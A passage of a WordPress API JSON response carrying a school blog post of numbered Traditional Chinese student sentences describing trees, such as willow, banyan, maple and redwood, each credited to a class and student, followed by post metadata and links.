serif;\">\u5f35\u6e1d\u83ef\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">15.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e0d\u66fe\u5f35\u63da\uff0c\u6697\u6697\u70ba\u6625\u65e5\u589e\u6dfb\u4e86\u5e7e\u5206\u984f\u8272\uff0c\u7d30\u7d30\u67f3\u8449\u5782\u4e0b\uff0c\u8fce\u98a8\u98c4\u98db\uff0c\u50cf\u4e00\u9996\u6726\u6727\u7684\u8a69\uff0c\u5bc4\u8a17\u591a\u5c11\u53e4\u4eca\u7684\u96e2\u60c5\u4f9d\u4f9d\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u67f3\uff0f\u4e09\u516c\u3000\u9673\u827e\u7433<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">16.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u90a3\u68f5\u83e9\u63d0\u6a39\u4f47\u7acb\u65bc\u8def\u65c1\u3002\u5728\u8eca\u99ac\u55a7\u9b27\u7684\u5875\u56c2\u4e2d\u4f34\u6211\u4e00\u5e74\u5fa9\u4e00\u5e74\u3002\u5b83\u7528\u5e7e\u5343\u767e\u5e74\u7684\u9818\u609f\uff0c\u76fc\u4e16\u4eba\u9054\u89c0\u4fd7\u60c5\u3002\u50b3\u905e\u539f\u521d\u91cb\u8fe6\u725f\u5c3c\u738b\u5b50\u7684\u5bec\u654f\u8207\u6eab\u67d4\uff0c\u6d17\u6ecc\u4e86\u8eab\u65bc\u4eba\u4e16\u4e2d\u6253\u6efe\uff0c\u76f8\u4e92\u5e72\u6208\u7684\u8caa\u55d4\u7661\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u83e9\u63d0\u6a39\uff0f<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09\u516c\u3000\u6797\u8a9e\u828a<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">17.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4eba\u5011\u656c\u754f\u8457\u4f60\u7684\u9ad8\u5927\u548c\u6b77\u53f2\uff0c\u4f46\u4f60\u6240\u6563\u767c\u7684\u6c23\u606f\u4ee4\u4eba\u5011\u66f4\u70ba\u760b\u72c2\uff0c\u6253\u5012\u4e0b\u4e86\uff0c\u4ed6\u5011\u4e0d\u518d\u656c\u754f\uff0c\u53ea\u770b\u5230\u5229\u76ca\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6a1f\u6a39\uff0f<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09\u516c\u3000\u91d1\u6021\u5112<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">18.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8fd1\u767e\u6b72\u7684\u5927\u6995\u6a39\uff0c\u898b\u8b49\u6211\u5011\u5b09\u9b27\u7684\u7ae5\u5e74\u3002\u7d72\u7d72\u7e37\u7e37\u62ab\u6563\u7684\u967d\u5149\u5f9e\u6a39\u8449\u9593\u8f15\u8f15\u7051\u4e0b\uff0c\u5728\u7b11\u5bb9\u7a1a\u5ae9\u7684\u81c9\u9f90\u6620\u51fa\u9ede\u9ede\u5149\u5f71\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8001\u6995\u6a39\uff0f<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09\u516c\u3000\u674e\u923a\u7433<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">19.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u53e4\u4eba\u6b4c\u8a60\u6211\u7684\u9ad8\u6f54\uff0c\u6b4c\u8a60\u6211\u7a7a\u4e2d\u7684\u8b19\u865b\uff0c\u4e0d\u96b1\u8072\u98a8\u96e8\u7684\u7ab8\u7aa3\uff0c\u537b\u4e0d\u898b\u66f4\u771f\u5be6\u7684\u5c71\u6797\u9593\u7684\u72c2\u653e\u3002<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7af9<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\uff0f<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u4e09\u516c\u3000\u9673\u5b63\u6600<span>)<\/span><\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">20.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u633a\u62d4\u7684\u8ec0\u5e79\u9802\u8457\u6d74\u706b\u800c\u751f\u7684\u8449\uff0c\u5b83\u5011\u54c0\u621a\u7684\u8207\u98a8\u5171\u821e\u3002\u4e94\u6307\u822c\u7684\u6953\u8449\u5f77\u5f7f\u63d0\u9192\u4e86\u6211\u5011\u5b83\u7684\u4e03\u60c5\u516d\u617e\uff0c\u5728\u5fae\u98a8\u8085\u6bba\u7684\u79cb\u65e5\u88e1\uff0c\u5e36\u8457\u539f\u7f6a\u822c\u7684\u8840\u7d05\uff0c\u9ed8\u7136\u58d3\u6291\u8457\uff0c\u5448\u73fe\u7d66\u6211\u5011\u6700\u5df4\u6d1b\u514b\u5f0f\u7684\u6b4c\u821e\u5287\uff0c\u91c0\u7d66\u6211\u5011\u751c\u5165\u5fc3\u813e\u7684\u7cd6\u871c\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6953\u6a39\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">08<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5442\u7d39\u7995<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">21.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7e3d\u662f\u90a3\u9ebc\u7684\u9b31\u9752\u3001\u90a3\u9ebc\u7684\u9ad8\u5927\uff0c\u4ed6\u5011\u662f\u81ea\u7136\u754c\u7684\u98a8\u96f2\u4eba\u7269\uff01\u7e3d\u662f\u88ab\u52d5\u7269\u5011\u74b0\u62b1\uff0c\u6709\u6642\u5c0f\u61a9\u5047\u5bd0\uff0c\u6709\u6642\u4e58\u6dbc\u804a\u5929\u3002\u5728\u5b64\u5bc2\u7684\u51ac\u5929\uff0c\u53ea\u6709\u4ed6\u5011\u5728\u67af\u6728\u7fa4\u4e2d\uff0c\u9583\u8457\u7fe0\u5149\uff0c\u7d66\u51ac\u5929\u7684\u68ee\u6797\u4eae\u8457\u5b89\u5fc3\u7684\u7da0\u71c8\u5854\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u677e\u67cf\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">26<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9673\u5f8b\u7dba<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">22.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9b41\u68a7\u7684\u58ef\u4e01\u7ad9\u5728\u4ed6\u8173\u4e0b\u90fd\u986f\u5f97\u5b0c\u5c0f\uff0c\u5e74\u9081\u7684\u8001\u4eba\u501a\u5728\u4ed6\u8eab\u65c1\u90fd\u986f\u5f97\u9752\u6f80\u3002\u9f9c\u88c2\u7684\u6a39\u76ae\u8c61\u5fb5\u4ed6\u7684\u97cc\u6027\uff0c\u932f\u7d9c\u7684\u679d\u689d\u662f\u6b72\u6708\u7684\u7d2f\u7a4d\uff0c\u6c89\u7a69\u7684\u7da0\u548c\u68d5\u878d\u5165\u6574\u500b\u6c24\u6c33\u7684\u5927\u5730\uff0c\u800c\u6e3a\u5c0f\u7684\u6211\uff0c\u6b63\u8caa\u5a6a\u5438\u9032\u80f8\u5ed3\u7684\u53ef\u662f\u7d05\u6a9c\u5de8\u6728\u5343\u5e74\u5b55\u5410\u51fa\u7684\u9748\u6c23\u2014\u2014\u82ac\u591a\u7cbe\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u7d05\u6a9c\u5de8\u6728\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">30<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u9ec3\u8a60\u5a77<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">23.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u98a8\u98ad\u73e0\u7c3e\uff0c\u671b\u7a97\u5916\u770b\uff0c\u6b63\u898b\u90a3\u6a39\u6416\u66f3\u8457\u8f15\u6162\u7684\u7bc0\u594f\u2500\u2500\u79cb\u98a8\u98af\u98af\uff0c\u79cb\u6953\u843d\u4e0b\u3002\u5df4\u638c\u5927\u7684\u6731\u8449\uff0c\u6070\u4f3c\u82ad\u96f7\u821e\u8005\u96a8\u8457\u65cb\u5f8b\u8f49\u554a\u8f49\u7684\u98c4\u843d\uff0c\u53c8\u4f3c\u90a3\u6a58\u7d05\u8272\u6696\u967d\u7684\u897f\u843d\u2500\u2500\u4e0d\u53ea\u662f\u4e00\u65e5\u7684\u5c3e\u8072\uff0c\u800c\u662f\u6642\u7bc0\u7684\u905e\u5b17\uff0c\u90a3\u5f9e\u70c8\u590f<\/span><span style=\"font-size: 11pt;\">.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u8d70\u5411\u9686\u51ac\u7684\u5606\u606f\u3002<\/span><span style=\"font-size: 11pt;\">(<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6953\u6a39\uff0f\u4e09\u8aa0<\/span><span style=\"font-size: 11pt;\">09<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u674e\u5ead\u5b89<\/span><span style=\"font-size: 11pt;\">)<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">24.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5b69\u5b50\u5011\u7684\u5b09\u7b11\u8072\u6dae\u52d5\u8457\u6211\u7684\u9aee\u7d72\uff0c\u7c0c\u7c0c\u4f5c\u97ff\u7684\uff0c\u662f\u767e\u5e74\u4e0d\u8b8a\u7684\u5805\u6bc5\uff0c\u4f38\u958b\u96d9\u81c2\uff0c\u6211\u7528\u9ad8\u8073\u6490\u958b\u982d\u4e0a\u7684\u85cd\u5929\uff0c\u7136\u5f8c\u63d0\u8d77\u6c89\u91cd\u7684\u8173\u8ddf\uff0c\u7e7c\u7e8c\u7528\u7121\u76e1\u7684\u751f\u547d\u66f8\u5beb\u570d\u7e5e\u5728\u8eab\u65c1\u7684\u6545\u4e8b\u3002\u3008\u6995\u6a39\uff0f\u4e09\u6bc5<\/span><span style=\"font-size: 11pt;\">\u00a0 <\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u6f58\u6021\u5609\u3009<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">25.<\/span><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u5728\u842c\u7269\u745f\u7e2e\u7684\u79cb\uff0c\u7dbb\u653e\u5982\u706b\u7130\u822c\u7684\u91d1\u9ec3\u82b1\u5e8f\uff0c\u6d3b\u6f51\u800c\u751f\u52d5\u5730\u8df3\u8e8d\u5728\u57ce\u5e02\u7684\u8857\u9053\uff0c\u8ce6\u4e88\u6709\u5225\u6dd2\u6dbc\u856d\u745f\u7684\u51cb\u96f6\uff0c\u4e00\u7a2e\u5225\u958b\u751f\u9762\u7684\u71b1\u60c5\u3002\uff08\u53f0\u7063\u6b12\u6a39\uff0f\u4e09\u6bc5\u3000\u65bd\u84d3\u5a77\uff09<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\">\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt; font-family: \u65b0\u7d30\u660e\u9ad4, serif;\">\u00a0<\/span><\/p>\n<p style=\"margin: 0cm 36pt 0.0001pt 51.4pt; text-indent: -15.4pt; line-height: 22pt;\"><span style=\"font-size: 11pt;\">\u00a0<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0 \u00a0 \u690d\u7269\u7684\u63cf\u5beb \u82b1 1.\u5c0d\u65bc\u6885\u82b1\uff0c\u6709\u4eba\u611b\u5b83\u60c5\u64cd\u5982\u96ea\uff0c\u6709\u4eba\u611b\u5b83\u5e7d\u9999\u6fc3\u70c8\uff0c\u6709\u4eba\u611b\u5b83\u5805\u8c9e\u5982\u9435\u3002\u4f46\u662f\uff0c\u4eba\u5011\u7e3d\u611b\u628a\u5bd2 [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1,42,65,47],"tags":[102],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1331"}],"collection":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1331"}],"version-history":[{"count":1,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1331\/revisions"}],"predecessor-version":[{"id":1332,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=\/wp\/v2\/posts\/1331\/revisions\/1332"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1331"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1331"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/yujuwu\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1331"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}